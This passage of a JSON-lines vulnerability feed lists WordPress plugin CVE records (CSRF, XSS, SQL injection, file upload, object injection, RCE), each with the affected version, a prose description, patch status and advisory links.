possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L158\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L158\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L360\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/tags\\\/1.1.6\\\/inc\\\/class-dnd-upload-wc.php#L360\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289478\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289478\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drag-and-drop-multiple-file-upload-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933dd704-5a31-42a9-9b87-bf14a9d4ffa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/933dd704-5a31-42a9-9b87-bf14a9d4ffa9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4190","slug":"csv-mass-importer","versionImpact":"1.2","description":"The CSV Mass Importer WordPress plugin through 1.2 does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e525ece5-6e03-4aee-bf5b-6ae0b961f027\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e525ece5-6e03-4aee-bf5b-6ae0b961f027\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6213","slug":"fastcgi-cache-purge-and-preload-nginx","versionImpact":"2.1.1","description":"The Nginx Cache Purge Preload plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.1.1 via the 'nppp_preload_cache_on_update' function. This is due to insufficient sanitization of the $_SERVER['HTTP_REFERERER'] parameter passed from the 'nppp_handle_fastcgi_cache_actions_admin_bar' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/psaux-it\\\/nginx-fastcgi-cache-purge-and-preload\",\"name\":\"https:\\\/\\\/github.com\\\/psaux-it\\\/nginx-fastcgi-cache-purge-and-preload\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastcgi-cache-purge-and-preload-nginx\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastcgi-cache-purge-and-preload-nginx\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe8c101-5e0a-4ba7-8ff7-4c8ed01e9ef5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bbe8c101-5e0a-4ba7-8ff7-4c8ed01e9ef5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1472","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions, via forged request granted they can trick a site administrator into performing an action such as clicking on a link. Actions include resetting the API key, accessing or deleting log files, and deleting cache among others.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unusedcss\\\/tags\\\/1.7.1\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unusedcss\\\/tags\\\/1.7.1\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php#L70\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f9ee168-82b1-4d13-a84e-379f16dcb283?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f9ee168-82b1-4d13-a84e-379f16dcb283?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2402","slug":"wp-responsive-photo-gallery","versionImpact":"1.0.13","description":"The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51a1c2de-56be-4487-874a-a916e8a6992a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51a1c2de-56be-4487-874a-a916e8a6992a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808029%40wp-responsive-photo-gallery%2Ftags%2F1.0.13&new=2905480%40wp-responsive-photo-gallery%2Ftags%2F1.0.14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808029%40wp-responsive-photo-gallery%2Ftags%2F1.0.13&new=2905480%40wp-responsive-photo-gallery%2Ftags%2F1.0.14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4422","slug":"post-smtp","versionImpact":"2.0.20","description":"The POST SMTP Mailer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.20. This is due to missing or incorrect nonce validation on the handleCsvExport() function. This makes it possible for unauthenticated attackers to trigger a CSV export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e018ca7c-06dd-4d40-91d4-4ed188b8aaf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e018ca7c-06dd-4d40-91d4-4ed188b8aaf2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473579%40post-smtp&new=2473579%40post-smtp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473579%40post-smtp&new=2473579%40post-smtp&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1906","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxAddCategory function. This makes it possible for unauthenticated attackers to add categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6022","slug":"contentlock","versionImpact":"1.0.3","description":"The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/871a93b5-ec67-4fe0-bc39-e5485477fbeb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/871a93b5-ec67-4fe0-bc39-e5485477fbeb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6894","slug":"integracao-rd-station","versionImpact":"5.3.2","description":"The RD Station plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.3.2 due to insufficient input sanitization and output escaping of post metaboxes added by the plugin. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5075a8-1da1-4738-ad4b-b6c323d772ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5075a8-1da1-4738-ad4b-b6c323d772ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-rd-station\\\/trunk\\\/metaboxes\\\/add_custom_scripts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/integracao-rd-station\\\/trunk\\\/metaboxes\\\/add_custom_scripts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integracao-rd-station\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/integracao-rd-station\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9220","slug":"lh-copy-media-file","versionImpact":"1.08","description":"The LH Copy Media File plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.08. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9911e99e-0b3b-4be1-b8cd-28593b6d12ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9911e99e-0b3b-4be1-b8cd-28593b6d12ad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-copy-media-file\\\/trunk\\\/lh-copy-media-file.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lh-copy-media-file\\\/trunk\\\/lh-copy-media-file.php#L31\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9898","slug":"parallax-image","versionImpact":"1.8","description":"The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's dd-parallax shortcode in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57641366-85d3-4375-8cde-041227c9f811?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57641366-85d3-4375-8cde-041227c9f811?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/trunk\\\/assets\\\/shortcode.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/parallax-image\\\/trunk\\\/assets\\\/shortcode.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/parallax-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/#file16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/#file16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170176\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10325","slug":"header-footer-elementor","versionImpact":"1.6.45","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7773fd3a-2417-415e-97b0-735e99e62097?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7773fd3a-2417-415e-97b0-735e99e62097?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/header-footer-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182862\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182862\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10886","slug":"tribute-testimonial-gridslider","versionImpact":"1.0.4","description":"The Tribute Testimonials \u2013 WordPress Testimonial Grid\/Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tribute_testimonials_slider' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tribute-testimonial-gridslider\\\/tags\\\/1.0.4\\\/includes\\\/class-tribute-shortcode-generator.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tribute-testimonial-gridslider\\\/tags\\\/1.0.4\\\/includes\\\/class-tribute-shortcode-generator.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e461095-8dce-4502-8bbf-8c985105cf24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e461095-8dce-4502-8bbf-8c985105cf24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12258","slug":"wp-service-payment-form-with-authorizenet","versionImpact":"2.6.3","description":"The WP Service Payment Form With Authorize.net plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-service-payment-form-with-authorizenet\\\/trunk\\\/src\\\/wpspf-payments-list.php#L320\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-service-payment-form-with-authorizenet\\\/trunk\\\/src\\\/wpspf-payments-list.php#L320\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478a5b3-58ef-410e-801f-82eaa579941a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478a5b3-58ef-410e-801f-82eaa579941a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0796","slug":"wprequal","versionImpact":"8.2.10","description":"The Mortgage Lead Capture System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 8.2.10. This is due to missing or incorrect nonce validation on the 'wprequal_reset_defaults' action. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wprequal\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wprequal\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/316b807c-06ca-4448-acb9-80766a07258a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/316b807c-06ca-4448-acb9-80766a07258a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13831","slug":"wc-tabs","versionImpact":"1.0.0","description":"The Tabs for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input in the 'product_has_custom_tabs' function. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-tabs\\\/trunk\\\/wc-tabs-lite.php#L363\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-tabs\\\/trunk\\\/wc-tabs-lite.php#L363\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790a2c64-b358-41ed-be17-f2b99d294617?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/790a2c64-b358-41ed-be17-f2b99d294617?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2512","slug":"file-away","versionImpact":"3.9.9.0.1","description":"The File Away plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check and missing file type validation in the upload() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_management.php#L1094\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-away\\\/trunk\\\/lib\\\/cls\\\/class.fileaway_management.php#L1094\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/file-away\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a93313d-a5d7-4109-93c5-b2da26e7a486?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a93313d-a5d7-4109-93c5-b2da26e7a486?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1471","slug":"wp-popup-banners","versionImpact":"1.2.5","description":"The WP Popup Banners plugin for WordPress is vulnerable to SQL Injection via the 'banner_id' parameter in versions up to, and including, 1.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with minimal permissions, such as a subscrber, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L246\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L243\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-popup-banners\\\/trunk\\\/wp-popup-banners.php#L243\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8281cb20-73d3-4ab5-910e-d353b2a5cbd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8281cb20-73d3-4ab5-910e-d353b2a5cbd8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1019","slug":"helpdeskwp","versionImpact":"1.2.0","description":"The Help Desk WP WordPress plugin through 1.2.0 does not sanitise and escape some parameters, which could allow users with a role as low as Editor to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6331ca8-9603-4134-af39-8e77ac9d511c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6331ca8-9603-4134-af39-8e77ac9d511c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4421","slug":"advanced-popups","versionImpact":"1.1.1","description":"The Advanced Popups plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the metabox_popup_save() function. This makes it possible for unauthenticated attackers to save meta tags via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548724%40advanced-popups&new=2548724%40advanced-popups&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548724%40advanced-popups&new=2548724%40advanced-popups&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc7b51e5-6eb7-41ba-add3-f083fb34c5e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc7b51e5-6eb7-41ba-add3-f083fb34c5e1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
